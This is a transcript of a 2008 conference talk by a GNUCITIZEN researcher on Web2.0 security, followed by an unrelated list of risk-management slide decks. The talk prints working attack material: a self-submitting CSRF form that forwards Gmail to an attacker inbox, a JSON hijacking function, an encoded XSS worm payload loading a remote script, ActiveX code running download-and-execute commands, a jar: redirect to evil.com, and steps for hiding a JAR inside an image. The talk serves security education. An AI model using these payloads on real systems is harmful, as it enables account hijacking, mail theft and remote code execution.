risk 2008
play

RISK 2008 pdp information security researcher, hacker, founder of - PowerPoint PPT Presentation

Jan 14, 2023 •508 likes •1.04k views

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure We have

  2. RISK 2008

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. Cutting-edge Think Tank

  5. ABOUT GNUCITIZEN  Think tank  Research  Training  Consultancy  Ethical Hacker Outfit  Responsible disclosure  We have nothing to hide  Tiger Team  The only active Tiger Team in UK.  Proud to have some of the best pros in our team.

  6. OTHERS  Hakiri  Hacker Lifestyle  Spin Hunters  Social Hacking Research House

  7. WEB2.0 SECURITY overview of various Web2.0 vulnerabilities and threats

  8. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  9. WHAT IS WEB2.0

  10. WEB2.0 IS...  Marketing buzzword  Invented by O'Reilly Media in 2003  Wikis, Blogs, AJAX, Social Networks, etc...  APIs, SOA (Service Oriented Architecture)  Data in the Cloud  Applications on Demand

  11. WEB2.0 SECURITY  What is Web2.0 Security?  The security model of Web2.0 is represented by the grand total of every participating technology.

  12. LET'S BEGIN web2.0 issue run-down

  13. EVIL TWIN ATTACKS

  14. EVIL TWIN ATTACKS  Social Networks connect people.  Everybody is welcome to join.  There are no means to verify user's identity.  Therefore identities are forgable.  LinkedIn can be abused.  Facebook can be abused.  Any other social network can be abused.

  15. SOCIAL PHISHING  Social Networks like user-generated content.  Embedding images is a standard function.  Images can point to protected URLs.  Basic Authentication will pop-up upon rendering.  Users will be tricked into entering credentials.  ...because it is annoying. :)  ...or maybe because like to comply with the system  ...all in all, it breaks the trust model

  16. HACKING OPENID  Affected by the general types of vulnerabilities.  Raises phishing concerns.  Better then the current identification processes.  ...but could have a devastating effect.

  17. LIVE PROFILING  Snooping onto people's feeds  Twitter, Blogs, etc  Snooping onto people's locations  Location extraction services, Yahoo Pipes  Extracting meta data from public content  Pictures contains sensitive information like geo coordinates.  Querying Social Networks  People give sensitive information for free.  Your friends give information about you.

  18. THE GMAIL HIJACK TECHNIQUE

  19. THE GMAIL HIJACK TECHNIQUE

  20. THE GMAIL HIJACK TECHNIQUE

  21. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  22. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  23. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  24. HIJACKING JSON  Affects most AJAX applications  It has been used to hack Google accounts  Simple array overwrite technique function Array() {  var obj = this; var ind = 0; var getNext; getNext = function(x) { obj[ind++] setter = getNext; if(x) { var str = x.toString(); if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) { // alert email alert(str); } } }; this[ind++] setter = getNext; }

  25. THE SAMY WORM

  26. THE POWNCE WORM

  27. THE POWNCE WORM  Hypothetical Worm based on a real bug.  Point of injection:  [html junk] [point of injection; 16 chars max] [html junk] [correctly sanitized, safely rendered user-supplied data] [html junk]

  28. THE POWNCE WORM  Pseudo exploit: [html junk]  */<script>/* [html junk] */ XSS Payload which does not need to contain HTML meta characters /* [html junk]  Actual exploit: [html junk]  */<script>/* [html junk] */document.write(atob(/PHNjcmlwdCBzcmM9Imh0dHA6Ly9ja2Vycy5vcmcvcyI+PC9z Y3JpcHQ+PCEtLQ==/.toString().substr(1,56)));/* [html junk]

  29. THE POWNCE WORM

  30. VULNERABILITIES IN SKYPE  Deadly Combination  DailyMotion/Metacafe + XSS + Skype = 0wnage  Code <script>  var x=new ActiveXObject("WScript.Shell"); var someCommands="Some command-line commands to download and execute binary file"; x.run('cmd.exe /C "'+someCommands+'"'); </script>  Vector skype:?multimedia_mood&partner=metacafe&id=1053760   Credits  Miroslav Lučinskij  Aviv Raff

  31. VULNERABILITIES IN SKYPE  Pwnable via the AIR  AIRPWN  Karma  We knew about it last year!

  32. MAKING MONEY WITH XSS  We need large number of XSS vectors.  For each vector we inject ads for payload.  We use Web2.0 distribution channels to infect.  Social Bookmarking sites  Crowdsourcing sites  Social profiles  ..etc  We make money!

  33. FIREFOX JAR: URL HANDLER ISSUES  Basic jar: Example  jar: [url to archive] ! [path to file] jar: https://domain.com/path/to/jar.jar ! /Pictures/a.jpg   When uploaded and accessed it executes within the origins of the [url to archive]

  34. FIREFOX CROSS-SITE SCRIPTING CONDITIONS OVER JAR: URLS  Requires 302 Open Redirect  <html><head> <script language="javascript">window.location= " jar:http://groups.google.com/searchhi story/url?url=http://evil.com/evil.jar !/payload.htm ";</script> </head></html>  The one above pwns Google  Vector developed by Beford

  35. THE JAVA RUNTIME AND JAR  It pokes services behind the Firewall  It works with File Upload facilities  Social Engineering is Required!!!  It thinks of pictures like JARs

  36. THE JAVA RUNTIME AND JAR  Get an image from the Web:  fancyimage.jpg  Prepare a JAR:  jar cvf evil.jar Evil*.class  Put them together:  copy /B fancyimage.jpg + evil.jar fancyevilimage.jpg or cp fancyimage.jpg fancyevilimage.jpg cat evi.jar >> fancyevilimage.jpg

  37. DRIVE BY JAVA

Recommend

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk Review Risk Review Bob McGlashan Executive Vice President and Chief Risk Officer, Enterprise Risk and Portfolio Management March 4 2008 Forward

488 views • 10 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk

2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk

2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk Review Risk Review Bob McGlashan Executive Vice President and Chief Risk Officer, Enterprise Risk and Portfolio Management March 4 2008 Forward

469 views • 19 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer August 26 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

666 views • 11 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer November 25 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of

351 views • 12 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer May 27 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

711 views • 18 slides
Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive Vice President and Chief Risk Officer May 27 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

270 views • 9 slides
Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive Vice President and Chief Risk Officer November 25 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of

492 views • 6 slides
Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip

Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip

Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip Protter, Cornell University May 23, 2008 Credit Risk Credit risk investigates an entity (corporation, bank, individual) that borrows funds, promises

931 views • 59 slides
Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could

Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could

Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could cause severe financial loss or fundamentally undermine the competitive position of a company The risks that industry leading firms must manage if

331 views • 29 slides
Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos,

Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos,

Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos, Treasurer, Google Fx Risk Management Jim Colby, Assistant Treasurer, Honeywell International Interest Rate Risk Management Dennis

577 views • 13 slides
The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008

The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008

The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008 Ren Morissette, Hanqing Qiu and Ping Ching Winnie Chan R M i tt H i Qi d Pi Chi Wi i Ch Social Analysis Division Statistics Canada

539 views • 36 slides
The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT

The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT

The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT Dominique Delarue Market Risk IT Functional Architect 14 March 2008 Whats the story? Partition Number of positions a day (thousands) 120,000

532 views • 41 slides
Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk

Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk

FREE Lifelong Learning Event for Fasset Members Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk assessment control matrix management process Governance Risk appetite Agenda for and risk Risk

1.28k views • 105 slides
Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008

Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008

Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008 Professional Forum Index 1. Introduction Introduction 1. 2. Definition of Risk and ERM Definition of Risk and ERM 2. 3. Financial &amp; Non Financial

844 views • 34 slides
Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the

Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the

Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the low head, sm all Hydropow er Market Patrick Wiemann, 13/ 06/ 2008 Risk Management in the low head, small Hydropower Market 13.06.2008 &gt; &gt; I

1.47k views • 26 slides
On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On

On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On

On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On Multi-Period Risk Functionals Why to measure risk/acceptability In longer term planning such as portfolio planning, pension fund management,

752 views • 37 slides
Managing Operational Risk in the Global Supply Chain Feb 15, 2008 Doug Sunkel Director

Managing Operational Risk in the Global Supply Chain Feb 15, 2008 Doug Sunkel Director

Managing Operational Risk in the Global Supply Chain Feb 15, 2008 Doug Sunkel Director Americas Parts Distribution Key Points Elements of Risk in the Supply Chain Mitigation Strategies Performance Your Best Bet 2

525 views • 13 slides
Risk Assessment Reduce the workers and Biosafety is an inexact science, and

Risk Assessment Reduce the workers and Biosafety is an inexact science, and

Risk Analysis Biosafety Risk assessment, Risk Risk analysis encom passes Management &amp; risk risk assessm ent, risk communication m anagem ent, and risk com m unication. Ephy Khaemba International Livestock Research Institute

508 views • 11 slides
Workshop on the Disaster Risk Reduction in the Pacific Islands March 18 th , 2008 at Kobe,

Workshop on the Disaster Risk Reduction in the Pacific Islands March 18 th , 2008 at Kobe,

The Workshop on the Disaster Risk Reduction in the Pacific Islands on March 18 th , 2008, Kobe Workshop on the Disaster Risk Reduction in the Pacific Islands March 18 th , 2008 at Kobe, Hyogo, Japan Organized by Ministry of Foreign

312 views • 7 slides
Excellence in Oil and Gas 2008 26-27 May 2008 Forward Statement Disclaimer The information

Excellence in Oil and Gas 2008 26-27 May 2008 Forward Statement Disclaimer The information

Excellence in Oil and Gas 2008 26-27 May 2008 Forward Statement Disclaimer The information presented herein contains predictions, estimates and other forward looking statements that are subject to risk factors that are associated with the oil

470 views • 43 slides
Tullow Oil plc 2008 Half-yearly Results 27 August 2008 Disclaimer This presentation contains

Tullow Oil plc 2008 Half-yearly Results 27 August 2008 Disclaimer This presentation contains

Tullow Oil plc 2008 Half-yearly Results 27 August 2008 Disclaimer This presentation contains certain forward-looking statements that are subject to the usual risk factors and uncertainties associated with the oil and gas exploration and

683 views • 54 slides
Risk Management from an issuer perspective June 6 , 2008 Alli Allison Edwards Ed d Director

Risk Management from an issuer perspective June 6 , 2008 Alli Allison Edwards Ed d Director

Risk Management from an issuer perspective June 6 , 2008 Alli Allison Edwards Ed d Director of Product Development Fiserv, Inc. Fortune 500 company providing information technology for i fi i l t ti f th 30 processing financial

398 views • 15 slides
Equally-weighted Risk contributions: a new method to build risk balanced diversified portfolios

Equally-weighted Risk contributions: a new method to build risk balanced diversified portfolios

Equally-weighted Risk contributions: a new method to build risk balanced diversified portfolios S eminaire ??? ome Teiletche S ebastien Maillard, Thierry Roncalli and J er September 2008 The respective affiliations are

750 views • 56 slides
Innovative Approach Targeting At-Risk Youth PartnerSHIP 4 Health Began in 2008 through

Innovative Approach Targeting At-Risk Youth PartnerSHIP 4 Health Began in 2008 through

Innovative Approach Targeting At-Risk Youth PartnerSHIP 4 Health Began in 2008 through Minnesota Department of Health Statewide Health Improvement Program funding Work focused on schools, worksites, health care facilities and communities

916 views • 44 slides

More recommend